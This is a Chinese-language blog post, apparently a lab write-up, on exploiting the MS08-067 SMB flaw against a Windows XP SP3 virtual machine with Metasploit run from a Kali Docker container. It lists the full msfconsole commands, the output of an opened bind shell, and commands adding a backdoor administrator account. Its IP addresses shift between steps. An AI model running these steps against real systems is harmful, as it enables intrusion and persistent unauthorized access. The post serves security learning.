2. 程式人生 > >MS08-067漏洞滲透測試

MS08-067漏洞滲透測試

阿新 發佈:2018-12-07

本人主專業資訊對抗,結果跑去搞php,實屬不務正業。。。。。。
最近要整個漏洞滲透測試實驗,搞完後覺得挺有意思所以就寫出來分享一下。

MS08-067漏洞會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta

1.安裝靶機
下載window xp sp3 英文版映象並安裝在vmvare虛擬機器上 靶機ip:192.168.65.128
2.安裝kali linux以及Metasploit框架
ps:系統和框架都是通過docker進行安裝操作的,所以需要先了解一下docker
執行docker 輸入命令 docker pull kalilinux/kali-linux-docker 獲取kali linux映象
輸入 docker -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash


建立容器並互動式執行容器 容器ip: 172.17.0.2
輸入 git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
獲取metasploit框架
完成後輸入 cd ./metasploit進入框架目錄

[email protected]:/metasploit# ./msfconsole

輸入 ./msfconsole 執行框架,成功後按如下步驟

msf5 > use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程式
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2:#設定本地主機IP
LHOST => 172.17.0.2:
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128  #設定目標主機IP
RHOST => 192.168.65.129
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp   #設定payload
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options  #檢視配置

Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.65.129   yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.65.129   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit #實施攻擊

[*] 192.168.46.129:445 - Automatically detecting the target...
[*] 192.168.46.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.46.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.46.129:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.46.129:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.46.129:4444) at 2018-11-09 09:59:01 +0000

C:\WINDOWS\system32>

攻擊成功,獲取到目標主機cmdshell
接下來新建賬號 新增使用者名稱為xiayujie,密碼為xiayujie的使用者,並把xiayujie使用者新增到管理組

C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully.  #新增成功

有了cmdshell許可權,接下來想做什麼就都可以了

相關推薦

MS08-067漏洞滲透測試

本人主專業資訊對抗,結果跑去搞php,實屬不務正業。。。。。。 最近要整個漏洞滲透測試實驗,搞完後覺得挺有意思所以就寫出來分享一下。 MS08-067漏洞會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows2000/XP/

MS08-067漏洞重現

MS08-067漏洞重現                                 Hard_lu                                               2015-10-10 (1):MS08-067遠端溢位漏洞描述 MS08-0

使用metasploit(MSF)對windows的ms08-067漏洞進行利用的過程

0x01 實驗環境 攻擊機:kali linux  ip:10.10.10.131 目標機:windows server 2003 ip:10.10.10.1300x02 配置exploit msf > use exploit/windows/smb/ms08_067

fastjsion反序列化漏洞滲透測試筆記

本文原創地址:https://www.cnblogs.com/yunmuq/p/14268028.html ## 一、背景 fastjsion是阿里的開源Java工具:https://github.com/alibaba/fastjson 能快速地將物件序列化為json字串,或進行反序列化 其速度和效

滲透測試】NSA Windows 0day漏洞+修復方案

技術 數據 pos 創建 前段時間 更新 服務 主機 ima 這個漏洞是前段時間爆出來的,幾乎影響了全球70%的電腦,不少高校、政府和企業都還在用Windows服務器,這次時間的影響力堪稱網絡大地震。 ------------------------------------

滲透測試必知必會—Web漏洞

中國國情 系統錯誤 min jenkins 安全 第三方 weblogic 滲透測試 javascrip https://as.h5con.cn/articles/129985?spm=cnblog 0x00前言   本文為對WEB漏洞研究系列的開篇,日後會針對這些漏洞一一

【10.21總結】一個滲透測試練習例項——發現未知的漏洞(Race condition)

Write-up地址:Exploiting an unknown vulnerability 作者:Abhishek Bundela   這篇文章跟我之前看到的文章不太一樣,作者是按照一個練習的方式簡單描述了他對一個應用進行滲透測試的過程,其中提到的許多測試雖然沒有成功,但是對於像我這樣的菜鳥來說還是有很

Web滲透測試3個要點(資訊收集→漏洞發現→漏洞利用)

現在,隨著企業資訊化建設的開展,越來越多的重要資料會以電子媒介的形式存放,這在方便企業辦公的同時,也造成了極大的安全隱患。近年來,隨著APT攻擊的蔓延,使得越來越多的企業遭受不可挽回的重大損失。一個偶然的機會,有幸邀請到了一家國外專門做web安全的公司來對自己的web系統做安全測試。4周下來,我與幾位安全專家

web安全/滲透測試--35--TLS1/SSLv3重協商漏洞

1、漏洞描述: SSL/TLS是位於一種可靠地網路層協議TCP協議之上的一個協議,該協議是為了在客戶端和伺服器之間生成一個安全的連線,這種連線是私密的、可靠的並且通訊雙方可以互相驗證雙方的身份。所以SSL/TLS協議應該具有機密性、完整性和確定性。而對於重新協商

web安全/滲透測試--42--檔案上傳漏洞

1、漏洞描述: 檔案上傳漏洞,直面意思可以利用WEB上傳一些特定的檔案。一般情況下檔案上傳漏洞是指使用者上傳了一個可執行的指令碼檔案,並通過此指令碼檔案獲得了執行伺服器端命令的能力。檔案上傳本身是web中最為常見的一種功能需求,關鍵是檔案上傳之後伺服器端的處理、

web安全/滲透測試--46--POODLE資訊洩露漏洞

1、漏洞描述: 由於SSL 3.0使用的CBC塊加密的實現存在漏洞,攻擊者可以成功破解SSL連線的加密資訊,比如獲取使用者cookie資料。這種攻擊被稱為POODL攻擊(Padding Oracle On Downgraded Legacy Encryption

滲透測試---漏洞掃描

Nessus Nessus 是系統漏洞掃描與分析軟體,非常強大。 openVAS OpenVAS是開放式漏洞評估系統,也可以說它是一個包含著相關工具的網路掃描器。其核心部件是一個伺服器,包括一套網路

滲透測試之目錄遍歷漏洞

先上一張圖看看什麼是目錄遍歷漏洞。 對,目錄遍歷就長成這樣子 一般遇到目錄遍歷漏洞,我們常做的就是去尋找有價值的東西去下載,比如資料庫 一般是沒有index.php就可能出現像這樣的一個目錄遍歷的漏洞,但是一般情況下index檔案都會有的。 那麼怎麼去找目錄遍歷漏洞,一

滲透測試】目錄遍歷漏洞

許多的Web應用程式一般會有對伺服器的檔案讀取檢視的功能,大多會用到提交的引數來指明檔名 形如:http://www.nuanyue.com/getfile=image.jgp 當伺服器處理傳送過來的image.jpg檔名後,Web應用程式即會自動新增完整路徑,形如“d

Kali Linux 滲透測試:掃描漏洞

                                     Kali Lin

常規36個WEB滲透測試漏洞描述及修復方法----很詳細

  常規WEB滲透測試漏洞描述及修復                                  &nbs

小白日記36:kali滲透測試之Web滲透-手動漏洞挖掘(二)-突破身份認證,作業系統任意命令執行漏洞

手動漏洞挖掘 ###################################################################################### 手動漏洞挖掘

Kali Linux滲透測試 101 手動漏洞挖掘-CSRF 漏洞

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 2. 判斷漏洞 3. 伺服器原始

微軟ms08-067滲透實踐

簡單描述:MS08-067漏洞的全稱為“Windows Server服務RPC請求緩衝區溢位漏洞”,如果使用者在受影響的系統上收到特製的 RPC 請求,則該漏洞可能允許遠端執行程式碼。在 Microsoft Windows 2000Windows XP 和 Wi

滲透測試漏洞平臺DVWA-參考答案

0x00 前言         DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql編寫的一套用於常規WEB漏洞教學和檢測的WEB脆弱性測試程式。包